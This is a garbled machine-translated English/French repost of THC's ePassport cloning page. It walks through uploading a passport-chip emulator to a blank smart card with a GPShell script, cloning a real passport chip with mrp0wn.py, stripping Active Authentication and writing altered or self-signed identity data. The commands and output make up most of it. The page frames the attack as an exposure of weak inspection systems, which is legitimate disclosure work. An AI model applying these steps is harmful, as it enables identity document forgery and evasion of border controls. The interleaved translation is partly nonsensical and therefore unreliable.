Le gouvernement envisage d'utiliser ePassports à l'immigration et des frontières 
 Control. De contrôle. The information is electronically read from the Passport L'information par voie électronique est de lire les passeports 
 and displayed to a Border Control Officer or used by an automated et affiché à un agent de contrôle des frontières ou utilisés par un service automatisé 
 setup. l'installation. THC has discovered weaknesses in the system to (by)pass the THC a découvert des faiblesses dans le système de (par) la passe 
 security checks. les contrôles de sécurité. The detection of fake passport chips does not La détection de faux passeport ne jetons pas 
 work. travailler. Test setups do not raise alerts when a modified chip Test de réglages ne sont pas soulever des alertes quand une puce de modification 
 is used. est utilisée. This enables an attacker to create a Passport with an Cela permet à un utilisateur malveillant de créer un passeport avec un 
 altered Picture, Name, DoB, Nationality and other credentials. modifié l'image, Nom, le DOB, de nationalités et d'autres pouvoirs. 

 The manipulated information is displayed without any alarms going off. La manipulation des informations est affichée, sans faire du hors alarmes. 
 The exploitation of this loophole is trivial and can be verified using L'exploitation de cette faille est triviale et peut être vérifiée en utilisant 
 thc-epassport. THC-epassport. 

 Regardless how good the intention of the government might have been, the Peu importe la façon la bonne intention du gouvernement aurait peut-être été, le 
 facts are that tested implementations of the ePassports Inspection System sont des faits qui ont testé la mise en œuvre de la ePassports Système d'inspection 
 are not secure. ne sont pas sécurisés. 

 ePassports give us a false sense of security: We are made to believe ePassports nous donner un faux sentiment de sécurité: Nous sommes faits de croire 
 that they make usemore secure. qu'ils font usemore sécurité. I'm afraid that's not true: current J'ai bien peur que ce n'est pas vrai: en cours 
 ePassport implementations don't add security at all. ePassport implémentations de ne pas ajouter la sécurité à tous. 
 


 Thanks to Elv1s for beta testing! Merci à Elv1s en versions bêta de test! 

 Just follow two easy steps: Il suffit de suivre deux étapes faciles: 

 (1) Upload the emulator code to a blank JCOP v4.1 72k smart card (1) Télécharger l'émulateur de code à un vide JCOP v4.1 72k carte à puce 
 Use your favorite tool to upload the CAP file . Utilisez votre outil favori pour télécharger le fichier PAC. As an example GPShell  is À titre d'exemple GPShell est  
 used. utilisé. The script used to upload the CAP file: Le script utilisé pour télécharger le fichier PAC: 
 
 
 P:\GPShell-1.4.2>type epassport.script P: \ GPShell-1.4.2> type epassport.script 
 mode_211 
 enable_trace 
 establish_context 
 card_connect -readerNumber 3 card_connect-readerNumber 3 
 select -AID a000000003000000 Sélectionnez-AID a000000003000000 
 open_sc -security 1 -keyind 0 -keyver 0 -mac_key 404142434445464748494a4b4c4d4e4 open_sc sécurité-1-keyind 0-keyver 0-mac_key 404142434445464748494a4b4c4d4e4 
 f -enc_key 404142434445464748494a4b4c4d4e4f f-enc_key 404142434445464748494a4b4c4d4e4f 
 delete -AID A0000002471001 supprimer AIDE-A0000002471001 
 delete -AID A00000024710 supprimer AIDE-A00000024710 
 install -file epassport.cap -priv 00 -AID A0000002471001 -pkgAID A00000024710 installer fichier epassport.cap-priv-00-AIDE A0000002471001-pkgAID A00000024710 
 card_disconnect 
 release_context 

A sample output of an actual upload: Un exemple de sortie d'un effectif de téléchargement:

 P:\GPShell-1.4.2>GPShell.exe epassport.script P: \ GPShell-1.4.2> GPShell.exe epassport.script 
 mode_211 
 enable_trace 
 establish_context 
 card_connect -readerNumber 3 card_connect-readerNumber 3 
 * reader name OMNIKEY CardMan 5x21-CL 0 * Nom du lecteur Omnikey CardMan 5x21 CL-0 
 select -AID a000000003000000 Sélectionnez-AID a000000003000000 
 Command --> 00A4040008A000000003000000 Command -> 00A4040008A000000003000000 
 Wrapped command --> 00A4040008A000000003000000 Papillote de commande -> 00A4040008A000000003000000 
 Response <-- 6F108408A000000003000000A5049F6501FF9000 Réponse <- 6F108408A000000003000000A5049F6501FF9000 
 .. 
 .. 
 .. 
 Wrapped command --> 84E60C002506A0000002471007A000000247100107A00000024710010100 Papillote de commande -> 84E60C002506A0000002471007A000000247100107A00000024710010100 
 02C90000B918E8E43A25117700 
 Response <-- 9000 Réponse <- 9000 
 card_disconnect 
 release_context 

The CAP file currently supports the following files: La PAC fichier actuellement en charge les fichiers suivants:
* EF.COM : 256 bytes (required file) * EF.COM: 256 octets (fichier requis) * EF.SOD : 2560 bytes (required file) * EF.SOD: 2560 octets (fichier requis) * EF.DG1 : 128 bytes (required file) * EF.DG1: 128 octets (fichier requis) * EF.DG2 : 24576 bytes (required file) * EF.DG2: 24576 octets (fichier requis) * EF.DG3 : 20480 bytes (optional, future use) * EF.DG3: 20480 octets (en option, un usage futur) * EF.DG11: 128 bytes (optional, eg USA) * EF.DG11: 128 octets (facultatif, par exemple, Etats-Unis) * EF.DG12: 128 bytes (optional, eg USA) * EF.DG12: 128 octets (facultatif, par exemple, Etats-Unis) * EF.DG13: 64 bytes (optional, eg Japan) * EF.DG13: 64 octets (facultatif, par exemple, le Japon) * EF.DG15: 256 bytes (optional, eg The Netherlands) * EF.DG15: 256 octets (facultatif, par exemple, les Pays-Bas)
If you need support of other DGs, please let vonJeek know. Si vous avez besoin de l'appui d'autres DG, s'il vous plaît laissez vonJeek savoir.
(2a) Clone the chip (2 bis) Clone de la puce Using a customized THC version of Adam Laurie's RFIDIOt tools, you're able En utilisant une version personnalisée de THC de Adam Laurie de RFIDIOt outils, vous pouvez to read a chip's content and to write it to an emulator. de lire un contenu de la puce et de l'écrire sur un émulateur.

 P:\RFIDIOt-vonjeek>mrp0wn.py CLONE M3V0NJ33K000000999999 P: \ RFIDIOt-vonjeek> mrp0wn.py CLONE M3V0NJ33K000000999999 

 =============================================================================== ================================================== ============================= 
 = mrp0wn.py, an RFIDIOt ePassport utility by vonJeek = Mrp0wn.py, un utilitaire RFIDIOt ePassport par vonJeek   = = 
 = Use Jeroen van Beek's ePassport emulator as the target device. = Utiliser Jeroen van Beek ePassport l'émulateur comme le périphérique cible. = 
 =============================================================================== ================================================== ============================= 
 Put a ePassport near the terminal and press enter to continue... Mettez un ePassport près du terminal et appuyez sur ENTRÉE pour continuer ... 
 Reading document using KEY M3V0NJ33K000000999999, please be patient... Lecture du document en utilisant la clé M3V0NJ33K000000999999, s'il vous plaît être patient ... 
 Put the emulator near the terminal and press enter to continue... Mettez l'émulateur près de l'aérogare et appuyez sur ENTRÉE pour continuer ... 
 Writing new ePassport using files in /tmp. L'écriture de nouvelles ePassport utiliser des fichiers dans / tmp. 
 Writing /tmp/EF_COM.BIN: 0 bytes left... Rédaction / tmp / EF_COM.BIN: 0 octets gauche ... 
 Writing /tmp/EF_SOD.BIN: 0 bytes left... Rédaction / tmp / EF_SOD.BIN: 0 octets gauche ... 
 Writing /tmp/EF_DG1.BIN: 0 bytes left... Rédaction / tmp/EF_DG1.BIN: 0 octets gauche ... 
 Writing /tmp/EF_DG2.BIN: 0 bytes left... Rédaction / tmp/EF_DG2.BIN: 0 octets gauche ... 
 Setting the secret key to M3V0NJ33K200000009999998. Réglage de la clé secrète à M3V0NJ33K200000009999998. 
 Done, happy mrp0wning ;) Fait, heureux mrp0wning;) 

 Use the following command to read the chip: Utilisez la commande suivante pour lire la puce: 
 ./mrpkey.py "M3V0NJ33Kxxxx000000xx999999xxxxxxxxxxxxxxxxx" . / mrpkey.py "M3V0NJ33Kxxxx000000xx999999xxxxxxxxxxxxxxxxx" 

If your chip is protected using the optional Active Authentication mechanism, Si votre puce est protégé à l'aide de la optionnel mécanisme d'authentification Active, the Active Authentication data group (DG15, tag 0x6F) is removed from EF.COM Active le groupe de données d'authentification (DG15, tag 0x6F) est enlevé de EF.COM as demonstrated by Jeroen van Beek at the 2008 USA BlackHat Briefings . comme l'a montré par Jeroen van Beek à 2008 Etats-Unis blackhat Réunions d'information. Note
that mrp0wn.py's parameter 'STRIP_AA' must be set to the value 'True'. mrp0wn.py que l 'paramètre' STRIP_AA »doit être réglé à la valeur 'true'. This Cet attack will work on all inspection system implementations that are using eg attaque les travaux sur tous les système d'inspection qui sont mises en œuvre en utilisant par exemple ICAO's "worked examples" , see this site for more info on that. De l'OACI "exemples", voir ce site pour plus d'informations à ce sujet.

(2b) Write saved data (2b) Ecris données enregistrées It's also possible to write chip data you've saved earlier using RFIDIOt's Il est également possible d'écrire à puce les données que vous avez sauvegardé auparavant en utilisant la RFIDIOt
mrpkey.py. As an example you can use vonJeek's ePassport data . À titre d'exemple, vous pouvez utiliser vonJeek du ePassport données. Note that Notez que this data is self-signed: vonJeek started his own country 😀 Ces données sont auto-signé: vonJeek commencé son propre pays:-D

 P:\tmp>unzip vonjeek-epassport_dump.zip P: \ tmp> unzip vonjeek-epassport_dump.zip 
 Archive:  vonjeek-epassport_dump.zip Archive: vonjeek-epassport_dump.zip 
  extracting: EF_COM.BIN l'extraction: EF_COM.BIN 
   inflating: EF_DG2.BIN de gonflage: EF_DG2.BIN 
   inflating: EF_DG1.BIN de gonflage: EF_DG1.BIN 
  extracting: EF_SOD.BIN l'extraction: EF_SOD.BIN 	
	
 P:\>cd \RFIDIOt-vonjeek P: \> cd \ RFIDIOt-vonjeek 	
	
 P:\RFIDIOt-vonjeek>mrp0wn.py WRITE /tmp P: \ RFIDIOt-vonjeek> mrp0wn.py Ecrire / tmp 

 =============================================================================== ================================================== ============================= 
 = mrp0wn.py, an RFIDIOt ePassport utility by vonJeek = Mrp0wn.py, un utilitaire RFIDIOt ePassport par vonJeek   = = 
 = Use Jeroen van Beek's ePassport emulator as the target device. = Utiliser Jeroen van Beek ePassport l'émulateur comme le périphérique cible. = 
 =============================================================================== ================================================== ============================= 
 Document type is PASSPORT. Type de document est PASSEPORT. 
 Put the emulator near the terminal and press enter to continue... Mettez l'émulateur près de l'aérogare et appuyez sur ENTRÉE pour continuer ... 
 Writing new ePassport using files in /tmp. L'écriture de nouvelles ePassport utiliser des fichiers dans / tmp. 
 Writing /tmp/EF_COM.BIN: 0 bytes left... Rédaction / tmp / EF_COM.BIN: 0 octets gauche ... 
 Writing /tmp/EF_SOD.BIN: 0 bytes left... Rédaction / tmp / EF_SOD.BIN: 0 octets gauche ... 
 Writing /tmp/EF_DG1.BIN: 0 bytes left... Rédaction / tmp/EF_DG1.BIN: 0 octets gauche ... 
 Writing /tmp/EF_DG2.BIN: 0 bytes left... Rédaction / tmp/EF_DG2.BIN: 0 octets gauche ... 
 Setting the secret key to M3V0NJ33K200000009999998. Réglage de la clé secrète à M3V0NJ33K200000009999998. 
 Done, happy mrp0wning ;) Fait, heureux mrp0wning;) 

 Use the following command to read the chip: Utilisez la commande suivante pour lire la puce: 
 ./mrpkey.py "M3V0NJ33Kxxxx000000xx999999xxxxxxxxxxxxxxxxx" . / mrpkey.py "M3V0NJ33Kxxxx000000xx999999xxxxxxxxxxxxxxxxx" 

You can also alter data before writing it to an emulator chip. Vous pouvez également modifier les données avant d'écrire à un émulateur puce. If you want Si vous voulez to do that: this document contains details about - amongst others - DG1 and de le faire: ce document contient des détails sur - entre autres - et DG1 DG2 encoding. DG2 encodage. If you've updated the DGs you can sign them using Peter Si vous avez mis à jour le DG vous pouvez vous connecter à l'aide de Peter Gutmann's CryptLib . Gutmann du CryptLib.
A read-out of vonJeek's ePassport chip using the reference implementation Une lecture de vonJeek du ePassport puce à l'aide de la mise en œuvre de référence named Golden Reader Tool can be seen below. nommé Golden Reader Tool peut être vue ci-dessous.

If you're interested in ePassport related PKI (how to verify whether chip Si vous êtes intéressé par ePassport liées PKI (comment vérifier si puce content is signed by a bonafide authority?) please check the following URLs: le contenu est signé par une autorité de bonne foi?) s'il vous plaît vérifier l'URL ci-après:
* http://www2.icao.int/en/MRTD/Pages/icaoPKD.aspx * Http://www2.icao.int/en/MRTD/Pages/icaoPKD.aspx * http://www.icao.int/icao/en/atb/meetings/2008/TagMRTD18/TagMrtd18_ip04.pdf * Http://www.icao.int/icao/en/atb/meetings/2008/TagMRTD18/TagMrtd18_ip04.pdf * http://www.csca-si.gov.si/TR-PKI_mrtds_ICC_read-only_access_v1_1.pdf * Http://www.csca-si.gov.si/TR-PKI_mrtds_ICC_read-only_access_v1_1.pdf * http://www.timesonline.co.uk/tol/news/uk/crime/article4467106.ece * Http://www.timesonline.co.uk/tol/news/uk/crime/article4467106.ece * http://www.timesonline.co.uk/tol/news/uk/crime/article4467098.ece * Http://www.timesonline.co.uk/tol/news/uk/crime/article4467098.ece

source de http://freeworld.thc.org/thc-epassport/
Publicités